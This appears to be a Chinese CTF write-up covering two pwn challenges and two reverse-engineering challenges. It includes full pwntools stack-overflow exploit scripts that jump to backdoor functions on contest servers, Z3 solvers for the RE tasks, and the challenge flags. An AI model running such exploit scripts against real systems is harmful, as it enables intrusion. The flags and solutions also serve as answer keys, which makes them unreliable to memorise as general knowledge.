pwn-login
登陆功能,随便输入一定长度的字符串fuzz一下,然后会发送core数据,接受保存到本地可执行文件后。
后门函数和栈溢出,直接打就行了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62
| from pwn import * from pwn import u64,u32,p64,p32 from ctypes import * from libcfind import * from LibcSearcher import * import base64 import sys context(os='linux', arch='amd64', log_level='debug') context.terminal = ["tmux", "splitw", "-h"] debug = 0 if debug: p = process('./pwn') elf = ELF('./pwn') else: p = remote('prob04.contest.pku.edu.cn', 10004)
s = lambda data: p.send(data) sa = lambda text, data: p.sendafter(text, data) sl = lambda data: p.sendline(data) sla = lambda text, data: p.sendlineafter(text, data) r = lambda num=4096: p.recv(num) rl = lambda text: p.recvuntil(text) pr = lambda num=4096: sys.stdout.write(p.recv(num).decode()) inter = lambda: p.interactive() l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00')) l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00')) uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00')) int16 = lambda data: int(data, 16) lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
rl("Please input your token: ") sl('557:MEYCIQC2WA6edSSGVo8AOQCj3TXXSSM3owCagj6bHEkuZWg7CAIhAMi6iZUaOsH2KoK-UTxeC00-TSWHvE-3uXF33KxmiGq2')
backdoor = 0x401276 rl("Username: ") name = 'admin' sl(name) rl("Password: ") password = b'\x00'*0x98 + p64(backdoor+5)
sl(password)
inter()
|
pwn-easypwn
第二处存在栈溢出,用’\x00’截断溢出到后门函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45
| from pwn import * from pwn import u64,u32,p64,p32 from ctypes import * from libcfind import * from LibcSearcher import * import base64 import sys context(os='linux', arch='amd64', log_level='debug') context.terminal = ["tmux", "splitw", "-h"] debug = 0 if debug: p = process('./pwn') elf = ELF('./pwn') else: p = remote('prob07.contest.pku.edu.cn', 10007) elf = ELF('./pwn')
s = lambda data: p.send(data) sa = lambda text, data: p.sendafter(text, data) sl = lambda data: p.sendline(data) sla = lambda text, data: p.sendlineafter(text, data) r = lambda num=4096: p.recv(num) rl = lambda text: p.recvuntil(text) pr = lambda num=4096: sys.stdout.write(p.recv(num).decode()) inter = lambda: p.interactive() l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00')) l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00')) uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00')) int16 = lambda data: int(data, 16) lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
rl("Please input your token: ") sl('557:MEYCIQC2WA6edSSGVo8AOQCj3TXXSSM3owCagj6bHEkuZWg7CAIhAMi6iZUaOsH2KoK-UTxeC00-TSWHvE-3uXF33KxmiGq2') rl("Enter your username: ") sl(b'root\x00') rl("Enter the password: ") payload = b'!@#$%^&*()_+\x00' payload = payload.ljust(0x38,b'\x00') payload += p64(0x401177) s(payload)
inter()
|
re-easyre
换表的base64编码。
解码一下就行
flag{B4se64_1s_s0_e4sy}
re-babyre
有UPX壳,用upx.exe -d babyre脱壳
四个part,对应的变换过程,Z3列公式就能直接解
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52
| v5 = 907301700 + 2914111512 print('v5 =',hex(v5)) from z3 import * def solve_a1(): a1 = BitVec('a1', 32) s = Solver() s.add((a1 | 0x8E03BEC3) == (3 * (a1 & 0x71FC413C) - a1 - 1876131848)) if s.check() == sat: m = s.model() return m[a1].as_long() else: return None v6 = solve_a1() print('v6 =',hex(v6)) a1 = BitVec('a1', 32)
from z3 import * s = Solver() a1 = BitVec('a1', 32) s.add(a1 <= 0x10000000) s.add(4 * ((~a1 & 0xA8453437) + 2 * ~(~a1 | 0xA8453437)) + -3 * (~a1 | 0xA8453437) + 3 * ~(a1 | 0xA8453437) - (-10 * (a1 & 0xA8453437) + (a1 ^ 0xA8453437)) == 551387557) if s.check() == sat: print("v7 =", s.model()[a1]) else: print("No solution found")
from z3 import * a1 = BitVec('a1', 32) s = Solver() s.add(a1 <= 0x10000000) s.add(11 * ~(a1 ^ 0xE33B67BD) + 4 * ~(~a1 | 0xE33B67BD) - (6 * (a1 & 0xE33B67BD) + 12 * ~(a1 | 0xE33B67BD)) + 3 * (a1 & 0xD2C7FC0C) + -5 * a1 - 2 * ~(a1 | 0xD2C7FC0C) + ~(a1 | 0x2D3803F3) + 4 * (a1 & 0x2D3803F3) - -2 * (a1 | 0x2D3803F3) == -837785892) if s.check() == sat: model = s.model() a1_value = model[a1].as_long() print("v8 =", hex(a1_value)) else: print("No found")
print(hex(78769651))
|
替换对应part即可
flag{e3c6235c-05d9434d-04b1edf3-04034083}